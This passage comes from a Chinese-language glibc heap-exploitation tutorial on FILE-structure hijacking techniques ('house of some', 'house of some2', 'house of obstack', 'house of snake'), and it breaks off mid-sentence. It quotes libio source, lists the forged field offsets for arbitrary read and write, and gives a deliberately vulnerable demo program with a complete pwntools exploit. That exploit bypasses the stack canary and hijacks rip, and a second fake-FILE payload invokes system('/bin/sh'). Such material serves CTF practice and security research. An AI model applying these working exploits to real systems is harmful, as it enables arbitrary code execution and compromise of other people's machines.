    fp->_wide_data->_IO_state = fp->_wide_data->_IO_last_state;
    // 调用到这里
    nread = __libio_codecvt_length (cv, &fp->_wide_data->_IO_state,
    fp->_IO_read_base,
    fp->_IO_read_end, wnread);
    // ......

    }
    }
    }
    满足条件:
  • fp->_wide_data->_IO_write_ptr <= fp->_wide_data->_IO_write_base
  • fp->_wide_data->_IO_read_ptr - fp->_wide_data->_IO_read_end != 0
  • clen <= 0
    int
    __libio_codecvt_encoding (struct _IO_codecvt *codecvt)
    {
    /* See whether the encoding is stateful. */
    if (codecvt->__cd_in.step->__stateful)
    return -1;
    /* Fortunately not. Now determine the input bytes for the conversion
    necessary for each wide character. */
    if (codecvt->__cd_in.step->__min_needed_from
    != codecvt->__cd_in.step->__max_needed_from)
    /* Not a constant value. */
    return 0;

    return codecvt->__cd_in.step->__min_needed_from;
    }
  • fp->codecvt->__cd_in.step->__stateful != 0
  1. __libio_codecvt_length

  2. DL_CALL_FCT

  3. `gs = fp->_codecvt->__cd_out.step

  4. *(gs->__fct)(gs)

综上所述: * _flags设置为~(4 | 0x10) * vtable设置为_IO_wfile_jumps地址(加减偏移),使其能成功调用_IO_wfile_sync即可 * _wide_data设置为堆地址,假设地址为A,即满足*(fp + 0xa0) = A * _wide_data->_IO_write_ptr <= _wide_data->_IO_write_base,即满足*(A + 0x20) <= *(A + 0x18) * _wide_data->_IO_read_ptr != _wide_data->_IO_read_end,即满足*A != *(A + 8) * _codecvt设置为可控堆地址B,即满足*(fp + 0x98) = B * codecvt->__cd_in.step设置为可控堆地址C,即满足*B = C * codecvt->__cd_in.step->__stateful设置为非0,即满足*(B + 0x58) != 0 * codecvt->__cd_in.step->__shlib_handle设置为0,即满足*C = 0 * codecvt->__cd_in.step->__fct设置为地址D,地址D用于控制rip,即满足*(C + 0x28) = D。当调用到D的时候,此时的rdiC,如果rsi&codecvt->__cd_in.step_data可控

house of some(house of apple2 plus)

  • 利用条件
    1. 已知glibc基地址
    2. 可控的已知地址(可写入内容构造fake_IO_file
    3. 需要一次libc内任意地址写可控地址
    4. 程序能正常退出或者通过exit()退出
  • 优点:
    1. 无视目前的IO_validate_vtable检查(wide_datavtable加上检查也可以打)
    2. 第一次任意地址写要求低
    3. 最后攻击提权是栈上ROP,可以不需要栈迁移
    4. 源码级攻击,不依赖编译结果

利用_IO_new_file_underflow这个函数

int  
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;

/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;

if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}

/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);

if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);

_IO_release_lock (stdout);
}

_IO_switch_to_get_mode (fp);

/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
会调用_IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base)宏其对应的常规read函数如下
ssize_t  
_IO_file_read (FILE *fp, void *buf, ssize_t size)
{
return (__builtin_expect (fp->_flags2 & _IO_FLAGS2_NOTCANCEL, 0)
? __read_nocancel (fp->_fileno, buf, size)
: __read (fp->_fileno, buf, size));
}
read的三个参数都是可控的 - fd=>fp->_fileno - buf=>fp->_IO_buf_base - size=>fp->_IO_buf_end - fp->_IO_buf_base

其中的for循环我们可以看到对于_IO_list_all上的单向链表,通过了_chain串起来,并在_IO_flush_all中,会遍历链表上每一个FILE,如果条件成立,就可以调用_IO_OVERFLOW(fp, EOF)

由于_IO_new_file_underflow内有一个_IO_switch_to_get_mode函数其中有这个分支

if (fp->_IO_write_ptr > fp->_IO_write_base)  
if (_IO_OVERFLOW (fp, EOF) == EOF)
return EOF;
如果还是使用fp->_IO_write_ptr > fp->_IO_write_base来使得触发OVERFLOW就会出现无限递归,所以不可行,我们需要采取另一个分支,即
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) // 不可行  
|| (_IO_vtable_offset (fp) == 0 // 使用||之后的分支
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
实现任意地址读的条件 - _flags设置为~(2 | 0x8 | 0x800),设置为0即可(与apple2相同) - vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap地址,使得调用_IO_wfile_overflow即可(注意此处与apple2不同的是,此处的vtable不能加偏移,否则会打乱_IO_SYSREAD的调用) - _wide_data->_IO_write_base设置为0,即满足*(_wide_data + 0x18) = 0(与apple2相同) - _wide_data->_IO_write_ptr设置为大于_wide_data->_IO_write_base,即满足*(_wide_data + 0x20) > *(_wide_data + 0x18)(注意此处不同) - _wide_data->_IO_buf_base设置为0,即满足*(_wide_data + 0x30) = 0(与apple2相同) - _wide_data->_wide_vtable设置为任意一个包含_IO_new_file_underflow,其中原生的vtable就有,设置成_IO_file_jumps-0x48即可 - _vtable_offset设置为0 - _IO_buf_base_IO_buf_end设置为你需要写入的地址范围 - _chain设置为你下一个触发的fake file地址 - _IO_write_ptr <= _IO_write_base即可 - _fileno设置为0,表示read(0, buf, size) - _mode设置为2,满足fp->_mode > 0即可

任意地址写

fake_file_read = flat({  
0x00: 0, # _flags
0x20: 0, # _IO_write_base
0x28: 0, # _IO_write_ptr

0x38: 任意地址写的起始地址, # _IO_buf_base
0x40: 任意地址写的终止地址, # _IO_buf_end

0x70: 0, # _fileno
0x82: b"\x00", # _vtable_offset
0xc0: 2, # _mode
0xa0: wide_data的地址, # _wide_data
0x68: 下一个调用的fake file地址, # _chain
0xd8: _IO_wfile_jumps, # vtable
}, filler=b"\x00")

fake_wide_data = flat({
0xe0: _IO_file_jumps - 0x48,
0x18: 0,
0x20: 1,
0x30: 0,
}, filler=b"\x00")
任意地址读
fake_file_write = flat({  
0x00: 0x800 | 0x1000, # _flags

0x20: 需要泄露的起始地址, # _IO_write_base
0x28: 需要泄露的终止地址, # _IO_write_ptr

0x70: 1, # _fileno
0x68: 下一个调用的fake file地址, # _chain
0xd8: _IO_file_jumps, # vtable
}, filler=b"\x00")

攻击流程

  • 第一步:任意地址写_chain,这里可以写_IO_list_all或者stdin、stdout、stderr_chain位置,在这一步需要在可控地址上布置一个任意地址写的fake_IO_file,之后将fake_IO_file地址写入上述位置
  • 第二步:扩展fake_IO_file链条并泄露栈地址,在第一步的中,我们只有一个fake_IO_file,并不能完成更复杂的操作,所以这一步我们需要写入两个fake_IO_file,一个用于泄露environ内的值(即栈地址),另一个用于写入下一个fake_IO_file
  • 第三步:泄露栈内数据,并寻找ROP起始地址,这一步同样需要写入两个fake_IO_file,一个任意地址读,读取栈上内存,另一个任意地址写,向栈上写ROP
  • 第四步:写入ROP,实现栈上ROP攻击! [[./houseofsome1.png]]

house of some2

主要关注的函数是_IO_wfile_jumps_maybe_mmap中的_IO_wfile_underflow_maybe_mmap

利用条件为 1. 已知libc地址 2. 可控地址(可写入fake file) 3. 可控stdout指针或者_IO_2_1_stdout_结构体 4. 程序具有printf或者puts输出函数

优点如下 1. 与House of Some一样可以绕过目前的vtable检查 2. printfputs比较普遍,适用性广 3. 可以在栈上劫持控制流,衔接House of Some,完成最后攻击

先关注_IO_wfile_underflow_maybe_mmap函数

wint_t  
_IO_wfile_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Doing the underflow will choose mmap
or vanilla operations and then punt to the chosen underflow routine.
Then we can punt to ours. */
if (_IO_file_underflow_maybe_mmap (fp) == EOF)
return WEOF;

return _IO_WUNDERFLOW (fp);
}
最后调用了_wide_data内的虚表_IO_WUNDERFLOW 那么继续深入_IO_file_underflow_maybe_mmap函数
int  
_IO_file_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Choose mmap or vanilla operations
and then punt to the chosen underflow routine. */
decide_maybe_mmap (fp);
return _IO_UNDERFLOW (fp);
}
最后调用了FILE的虚表_IO_UNDERFLOW 继续深入decide_maybe_mmap函数
static void  
decide_maybe_mmap (FILE *fp)
{
/* We use the file in read-only mode. This could mean we can
mmap the file and use it without any copying. But not all
file descriptors are for mmap-able objects and on 32-bit
machines we don't want to map files which are too large since
this would require too much virtual memory. */
struct __stat64_t64 st;

if (_IO_SYSSTAT (fp, &st) == 0
&& S_ISREG (st.st_mode) && st.st_size != 0
/* Limit the file size to 1MB for 32-bit machines. */
&& (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
/* Sanity check. */
&& (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))
{
/* Try to map the file. */
void *p;
... 这里主要就是做了mmap
}

/* We couldn't use mmap, so revert to the vanilla file operations. */

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps;
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
}
有一个关键的_IO_SYSSTAT调用,以及,在这个函数最后会恢复FILE和_wide_data的虚表

整理一下可以知道,如果一个FILE进入了函数_IO_wfile_underflow_maybe_mmap,那么他将会运行如下的流程 1. _IO_SYSSTAT(fp, &st)调用虚表,传入栈指针 2. decide_maybe_mmap函数结束,恢复两个虚表 3. _IO_UNDERFLOW (fp)调用虚表 4. _IO_WUNDERFLOW (fp)调用虚表

_IO_file_jumps虚表的_IO_UNDERFLOW 函数中

count = _IO_SYSREAD (fp, fp->_IO_buf_base,  
fp->_IO_buf_end - fp->_IO_buf_base);
这一步,三个参数都可控,也就是可以写入任意地址

printfputs函数中,最后会调用stdout__xsputn虚表的入口 如果我们使得__xsputn的偏移直接指向__underflow呢? 那么就会得到如下的偏移

__xsputn -> __underflow  
__stat -> __write
此时,修改stdout的虚表为_IO_wfile_jumps_maybe_mmap-0x18

在上述调用过程中_IO_SYSSTAT(fp, &st)这个函数就会变成write(fp, &st, ??) 如果我们能够控制rdx就好了,这里就能做到栈数据泄露

能够控制的也就只有后续调用的_IO_UNDERFLOW (fp)中的_IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base);可以控制,由于decide_maybe_mmap会强制恢复虚表,所以这里我们不用担心篡改虚表带来的影响

如果rdx不可控直接执行write(fp, &st, ??)会怎么样,返回0或者非0 那么回到decide_maybe_mmap

这里判断,如果_IO_SYSSTAT (fp, &st)返回0,那么直接就不会进入if,如果返回不为0,我们看看S_ISREG的定义

#define	__S_ISTYPE(mode, mask)	(((mode) & __S_IFMT) == (mask))  
#define S_ISREG(mode) __S_ISTYPE((mode), __S_IFREG)

这里可以看到最后判断采用的是==判断,由于栈上数据的限制,这里通过判断的概率不高

以及还有st.st_size != 0判断,在没有正确执行stat逻辑,栈维持原貌的情况下,这个if通过概率不高

如果还高,可以控制fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size为假即可

那么就能顺利的执行完decide_maybe_mmap,并且保留伪造的fp内容没有任何变动

接下来就是调用_IO_file_jumps虚表的_IO_UNDERFLOW ,操作执行read

这里,我们可以设置,注意fake_file_start就是我们当前控制的fp地址

_IO_buf_base = fake_file_start  
_IO_buf_end = fake_file_start + 0x1c8 // 这里的1c8包括了widedata的长度

那么,这里我们就能再次重新复写fake,并扩大可控长度,widedata都可控了

回到上面执行流程,接下来就会执行_IO_WUNDERFLOW (fp)这个虚表函数了

然而,上述我们通过underflow重新控制了fp,也就是接下来的这个虚表函数,我们也是可控的

这里我们控制为_IO_WUNDERFLOW(fp) -> _IO_wfile_underflow_maybe_mmap

我们再次回到了起点,但是这次不一样了 在上一个小节,其实我们已经控制了rdx,因为_IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base)的第三个参数rdx = fp->_IO_buf_end - fp->_IO_buf_base

此时,此时我们依然有这四个执行流程 1. _IO_SYSSTAT(fp, &st)调用虚表,传入栈指针 2. decide_maybe_mmap函数结束,恢复两个虚表 3. _IO_UNDERFLOW (fp)调用虚表 4. _IO_WUNDERFLOW (fp)调用虚表

不同的是,此时_IO_SYSSTAT(fp, &st)可以被指向任意的虚表函数,因为在第二次控制fp的时候,我们又一次覆写了FILEvtable

那么此时我们就可以控制 _IO_SYSSTAT(fp, &st) -> _IO_new_file_read(fp, &st, rdx) 我们已经成功完成了栈溢出

很不幸,decide_maybe_mmap函数开启了canary,我们没办法在没有泄露栈的情况下,完成栈溢出

由于fileno的设置,无法完成write(1,stack,rdx)的操作,真的没有办法的了吗

那么接下来,有请_IO_default_xsputn_IO_default_xsgetn

我们阅读这两个函数源码

size_t  
_IO_default_xsgetn (FILE *fp, void *data, size_t n)
{
size_t more = n;
char *s = (char*) data;
for (;;)
{
/* Data available. */
if (fp->_IO_read_ptr < fp->_IO_read_end)
{
size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
if (count > more)
count = more;
if (count > 20)
{
s = __mempcpy (s, fp->_IO_read_ptr, count);
fp->_IO_read_ptr += count;
}
else if (count)
{
char *p = fp->_IO_read_ptr;
int i = (int) count;
while (--i >= 0)
*s++ = *p++;
fp->_IO_read_ptr = p;
}
more -= count;
}
if (more == 0 || __underflow (fp) == EOF)
break;
}
return n - more;
}


size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > more)
count = more;
if (count > 20)
{
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}

可以知道,这是对于fp内的缓冲区的操作,可以关注到的是这里函数内有两个关键的部分

_IO_default_xsgetn (FILE *fp, void *data, size_t n)   
==> __mempcpy(data, fp->_IO_read_ptr, n);
_IO_default_xsputn (FILE *f, const void *data, size_t n)
==> __mempcpy (f->_IO_write_ptr, data, n);
如果能够保证
fp->_IO_read_end - fp->_IO_read_ptr == n  
f->_IO_write_end - f->_IO_write_ptr == n
就不会进入__underflow_IO_OVERFLOW降低其他函数的干扰

这个时候就能衍生出一个大胆的想法,如果我们先将栈复制一份到可控的区域,再通过偏移写入,最后再拷贝回到栈内,那么我们就能完美的绕过canary并且,并不需要泄露canary

[[./houseofsome2.png]]

demo.c

// gcc demo.c -o demo  
#include<stdio.h>

int main(){
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
int c;
printf("[+] printf: %p\n", &printf);
while (1) {
puts(
"1. add heap.\n"
"2. write libc.\n"
"3. exit");
printf("> "
);
scanf("%d", &c);
if(c == 1) {
int size;
printf("size> ");
scanf("%d", &size);
char *p = malloc(size);
printf("[+] done %p\n", p);
printf("content> ");
read(0, p, size);
} else if(c == 2){
size_t addr, size;
printf("size> ");
scanf("%lld", &size);
printf("addr> ");
scanf("%lld", &addr);
printf("content> ");
read(0, (char*)addr, size);
} else {
break;
}
}
}

exp

from pwn import *  
context.log_level = 'debug'
context.arch = 'amd64'

tob = lambda x: str(x).encode()
io = process("./demo")

io.recvuntil(b"[+] printf: ")
printf_addr = int(io.recvuntil(b"\n", drop=True), 16)
log.success(f"printf_addr: {printf_addr:#x}")

def add(size):
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"size> ", tob(size))

def write(addr, size, content):
io.sendlineafter(b"> ", b"2")
io.sendlineafter(b"size> ", tob(size))
io.sendlineafter(b"addr> ", tob(addr))
io.sendafter(b"content> ", content)

def leave():
io.sendlineafter(b"> ", b"3")

libc = ELF("./libc.so.6", checksec=False)
libc_base = printf_addr - libc.symbols["printf"]
libc.address = libc_base
log.success(f"libc_base: {libc_base:#x}")

_IO_wfile_jumps_maybe_mmap = libc.address + 0x215f40
log.success(f"_IO_wfile_jumps_maybe_mmap: {_IO_wfile_jumps_maybe_mmap:#}")
_IO_str_jumps = libc.address + 0x2166c0
log.success(f"_IO_str_jumps: {_IO_str_jumps:#}")
_IO_default_xsputn = _IO_str_jumps + 0x38
_IO_default_xsgetn = _IO_str_jumps + 0x40

# 此处直接修改_IO_2_1_stdout_内容
write(libc.symbols["_IO_2_1_stdout_"], 0xe0, flat({
0x0: 0x8000, # disable lock
0x38: libc.symbols["_IO_2_1_stdout_"], # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0x70: 0, # _fileno
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0x100, # +0xe0可写即可
0xc0: p32(0xffffffff), # _mode < 0
0xd8: _IO_wfile_jumps_maybe_mmap - 0x18,
}, filler=b"\x00"))

# 拷贝栈上数据到可控地址,这里拷贝到_IO_2_1_stdout_的上方,方便下次写入顺便完成fp第三次控制
io.send(flat({
0x8: libc.symbols["_IO_2_1_stdout_"], # 需要可写地址

0x38: libc.symbols["_IO_2_1_stdout_"] - 0x1c8 + 0xc8, # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0xe0,
0xc0: p32(0xffffffff),

0xd8: _IO_default_xsputn - 0x90, # vtable
0x28: libc.symbols["_IO_2_1_stdout_"] - 0x1c8, # _IO_write_ptr
0x30: libc.symbols["_IO_2_1_stdout_"], # _IO_write_end

0xe0: {
0xe0: _IO_wfile_jumps_maybe_mmap
}
}, filler=b"\x00"))

# 最后这里就可以劫持执行流到0xdeadbeaf了
io.send(flat({
0: 0xdeadbeaf, # retn
0x1c8-0xc8: {
0x38: libc.symbols["_IO_2_1_stdout_"] - 0x1c8 + 0xc8, # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0xe0,
0xc0: p32(0xffffffff),

0xd8: _IO_default_xsgetn - 0x90, # vtable
0x08: libc.symbols["_IO_2_1_stdout_"] - 0x1c8, # _IO_read_ptr
0x10: libc.symbols["_IO_2_1_stdout_"] + (0x1c8 - 0xc8), # _IO_read_end

0xe0: {
0xe0: _IO_wfile_jumps_maybe_mmap
}
}
}, filler=b"\x00"))

io.interactive()

house of 琴瑟琵琶 | house of obstack(2.34~2.36)

_IO_obstack_file结构体

struct _IO_obstack_file
{
struct _IO_FILE_plus file;
struct obstack *obstack;
};

struct obstack /* control current object in current chunk */
{
long chunk_size; /* preferred size to allocate chunks in */
struct _obstack_chunk *chunk; /* address of current struct obstack_chunk */
char *object_base; /* address of object we are building */
char *next_free; /* where to add next char to current object */
char *chunk_limit; /* address of char after current chunk */
union
{
PTR_INT_TYPE tempint;
void *tempptr;
} temp; /* Temporary for some macros. */
int alignment_mask; /* Mask of alignment for each object. */
/* These prototypes vary based on 'use_extra_arg', and we use
casts to the prototypeless function type in all assignments,
but having prototypes here quiets -Wstrict-prototypes. */
struct _obstack_chunk *(*chunkfun) (void *, long);
void (*freefun) (void *, struct _obstack_chunk *);
void *extra_arg; /* first arg for chunk alloc/dealloc funcs */
unsigned use_extra_arg : 1; /* chunk alloc/dealloc funcs take extra arg */
unsigned maybe_empty_object : 1; /* There is a possibility that the current
chunk contains a zero-length object. This
prevents freeing the chunk if we allocate
a bigger chunk to replace it. */
unsigned alloc_failed : 1; /* No longer used, as we now call the failed
handler on error, but retained for binary
compatibility. */
};

_IO_obstack_overflow

  • 调用链
  1. _IO_obstack_overflow

    static int _IO_obstack_overflow (FILE *fp, int c)
    {
    struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;
    int size;

    /* Make room for another character. This might as well allocate a
    new chunk a memory and moves the old contents over. */
    assert (c != EOF); // 此处不可控
    obstack_1grow (obstack, c);

    /* Setup the buffer pointers again. */
    fp->_IO_write_base = obstack_base (obstack);
    fp->_IO_write_ptr = obstack_next_free (obstack);
    size = obstack_room (obstack);
    fp->_IO_write_end = fp->_IO_write_ptr + size;
    /* Now allocate the rest of the current chunk. */
    obstack_blank_fast (obstack, size);

    return c;
    }

  2. obstack_1grow (obstack, c)

  3. _obstack_newchunk (__o, 1)

  4. new_chunk = CALL_CHUNKFUN (h, new_size)

  5. (*(h)->chunkfun)((h)->extra_arg, (size))

_IO_obstack_xsputn(优先选择)

  • 调用链
  1. _IO_obstack_xsputn

    static size_t _IO_obstack_xsputn (FILE *fp, const void *data, size_t n)
    {
    struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;

    if (fp->_IO_write_ptr + n > fp->_IO_write_end)
    {
    int size;

    /* We need some more memory. First shrink the buffer to the
    space we really currently need. */
    obstack_blank_fast (obstack, fp->_IO_write_ptr - fp->_IO_write_end);

    /* Now grow for N bytes, and put the data there. */
    obstack_grow (obstack, data, n); //执行此函数

    /* Setup the buffer pointers again. */
    fp->_IO_write_base = obstack_base (obstack);
    fp->_IO_write_ptr = obstack_next_free (obstack);
    size = obstack_room (obstack);
    fp->_IO_write_end = fp->_IO_write_ptr + size;
    /* Now allocate the rest of the current chunk. */
    obstack_blank_fast (obstack, size);
    }
    else
    fp->_IO_write_ptr = __mempcpy (fp->_IO_write_ptr, data, n);

    return n;
    }

  2. obstack_grow (obstack, data, n)

            obstack_grow(obstack, data, n);
    定义:
    # define obstack_grow(OBSTACK, where, length) \
    __extension__ \
    ({ struct obstack *__o = (OBSTACK); \
    int __len = (length); \
    if (__o->next_free + __len > __o->chunk_limit) \
    _obstack_newchunk (__o, __len); \
    memcpy (__o->next_free, where, __len); \
    __o->next_free += __len; \
    (void) 0; })
    替换:
    ({
    struct obstack *__o = (obstack);
    int __len = (n);
    if (__o->next_free + __len > __o->chunk_limit)_obstack_newchunk(__o, __len);
    memcpy(__o->next_free, data, __len);
    __o->next_free += __len;
    (void) 0;
    });

  3. _obstack_newchunk (__o, __len)

    void _obstack_newchunk(struct obstack *h, int length) {
    struct _obstack_chunk *old_chunk = h->chunk;
    struct _obstack_chunk *new_chunk;
    long new_size;
    long obj_size = h->next_free - h->object_base;
    long i;
    long already;
    char *object_base;

    /* Compute size for new chunk. */
    new_size = (obj_size + length) + (obj_size >> 3) + h->alignment_mask + 100;
    if (new_size < h->chunk_size)
    new_size = h->chunk_size;

    /* Allocate and initialize the new chunk. */
    new_chunk = CALL_CHUNKFUN(h, new_size); // 调用函数位置
    ...
    }

  4. new_chunk = CALL_CHUNKFUN (h, new_size)

    new_chunk = CALL_CHUNKFUN(h, new_size);
    定义:
    #define CALL_CHUNKFUN(h, size) \
    (((h)->use_extra_arg) \
    ? (*(h)->chunkfun)((h)->extra_arg, (size)) \
    : (*(struct _obstack_chunk * (*) (long) )(h)->chunkfun)((size)))
    替换:
    (((h)->use_extra_arg) ? (*(h)->chunkfun)((h)->extra_arg, (new_size)) : (*(struct _obstack_chunk *(*) (long) )(h)->chunkfun)((new_size)))
    第一个参数可控,同时需要保证(((h)->use_extra_arg)1

  5. (*(h)->chunkfun)((h)->extra_arg, (size))

[[./houseofobstack1.png]]

exp如下

fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30
fake_io_file = b''
fake_io_file = fake_io_file.ljust(0x58,b'\x00')
fake_io_file += p64(system_addr) # 需要执行的函数
fake_io_file += p64(0)
fake_io_file += p64(fake_io_addr+0xe8) # 执行函数的 rdi
fake_io_file += p64(1) # obstack->use_extra_arg=1
fake_io_file += p64(heap_addr+0x2000) # _IO_lock_t *_lock;
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_obstack_jumps_addr + 0x20) # 触发 _IO_obstack_xsputn;
fake_io_file += p64(obstack_ptr) # struct obstack *obstack
print(hex(len(fake_io_file))) # 因为是largebin attack 所以: 0xd8=0xe8-0x10
# pause()

# 执行函数的 rdi 的地址所存储的内容
payload = fake_io_file+ b'/bin/sh\x00'

house of snake(house of obstack plus)

libc-2.37后由house of obstack转换为house of snake 删除了 _IO_obstack_jumps 但是添加了 _IO_printf_buffer_as_file_jumps 这个新的 _IO_jumps_t 结构体

static const struct _IO_jump_t _IO_printf_buffer_as_file_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, NULL),
JUMP_INIT(overflow, __printf_buffer_as_file_overflow),
JUMP_INIT(underflow, NULL),
JUMP_INIT(uflow, NULL),
JUMP_INIT(pbackfail, NULL),
JUMP_INIT(xsputn, __printf_buffer_as_file_xsputn),
JUMP_INIT(xsgetn, NULL),
JUMP_INIT(seekoff, NULL),
JUMP_INIT(seekpos, NULL),
JUMP_INIT(setbuf, NULL),
JUMP_INIT(sync, NULL),
JUMP_INIT(doallocate, NULL),
JUMP_INIT(read, NULL),
JUMP_INIT(write, NULL),
JUMP_INIT(seek, NULL),
JUMP_INIT(close, NULL),
JUMP_INIT(stat, NULL),
JUMP_INIT(showmanyc, NULL),
JUMP_INIT(imbue, NULL)
};
其中__printf_buffer_as_file_overflow 函数定义如下:
static inline bool __attribute_warn_unused_result__
__printf_buffer_has_failed(struct __printf_buffer *buf) {
return buf->mode == __printf_buffer_mode_failed;
}

static int
__printf_buffer_as_file_overflow(FILE *fp, int ch) {
struct __printf_buffer_as_file *file = (struct __printf_buffer_as_file *) fp;

__printf_buffer_as_file_commit(file);

/* EOF means only a flush is requested. */
if (ch != EOF)
__printf_buffer_putc(file->next, ch);

/* Ensure that flushing actually produces room. */
if (!__printf_buffer_has_failed(file->next)
&& file->next->write_ptr == file->next->write_end)
__printf_buffer_flush(file->next);

...
}
首先 __printf_buffer_as_file_overflow 函数将 FILE 结构体转换为 __printf_buffer_as_file 类型,相关定义如下:
struct __printf_buffer
{
char *write_base;
char *write_ptr;
char *write_end;
uint64_t written;
enum __printf_buffer_mode mode;
};

struct __printf_buffer_as_file
{
/* Interface to libio. */
FILE stream;
const struct _IO_jump_t *vtable;

/* Pointer to the underlying buffer. */
struct __printf_buffer *next;
};
之后调用了 __printf_buffer_as_file_commit ,该函数做了一些检查:
static void
__printf_buffer_as_file_commit (struct __printf_buffer_as_file *file)
{
/* Check that the write pointers in the file stream are consistent
with the next buffer. */
assert (file->stream._IO_write_ptr >= file->next->write_ptr);
assert (file->stream._IO_write_ptr <= file->next->write_end);
assert (file->stream._IO_write_base == file->next->write_base);
assert (file->stream._IO_write_end == file->next->write_end);

file->next->write_ptr = file->stream._IO_write_ptr;
}
之后根据参数ch是否为EOF决定是否调用 __printf_buffer_putcFSOP中调用的_IO_flush_all_lockp函数中是通过_IO_OVERFLOW (fp, EOF)调用到vtable中的overflow函数,因此__printf_buffer_as_file_overflow的参数chEOF, 当然,即使调用到了__printf_buffer_putc也只是是做了一些指针记录的数值加减的操作,对此我们不用过多关注

再之后会调用__printf_buffer_flush函数,调用条件是file->next.mode != __printf_buffer_mode_failedfile->next->write_ptr == file->next->write_end

__printf_buffer_flush函数定义如下,这里再次检查file->next.mode != __printf_buffer_mode_failed然后调用__printf_buffer_do_flush函数,参数为file->next

#define Xprintf(n) __printf_##n
#define Xprintf_buffer_flush Xprintf (buffer_flush)
#define Xprintf_buffer Xprintf (buffer)

bool
Xprintf_buffer_flush (struct Xprintf_buffer *buf)
{
if (__glibc_unlikely (Xprintf_buffer_has_failed (buf)))
return false;

Xprintf (buffer_do_flush) (buf); // __printf_buffer_do_flush(buf)
...
}

如果 file->next.mode = __printf_buffer_mode_obstack(11) 那么会调用 __printf_buffer_flush_obstack 函数

static void
__printf_buffer_do_flush (struct __printf_buffer *buf)
{
switch (buf->mode)
{
...
case __printf_buffer_mode_obstack:
__printf_buffer_flush_obstack ((struct __printf_buffer_obstack *) buf);
return;
}
...
}
__printf_buffer_obstack 结构体定义如下:
struct __printf_buffer_obstack
{
struct __printf_buffer base;
struct obstack *obstack;
char ch;
};
如果满足 buf->base.write_ptr == &buf->ch + 1 则 __printf_buffer_flush_obstack 会执行 obstack_1grow 宏
void
__printf_buffer_flush_obstack (struct __printf_buffer_obstack *buf)
{
...
if (buf->base.write_ptr == &buf->ch + 1)
{
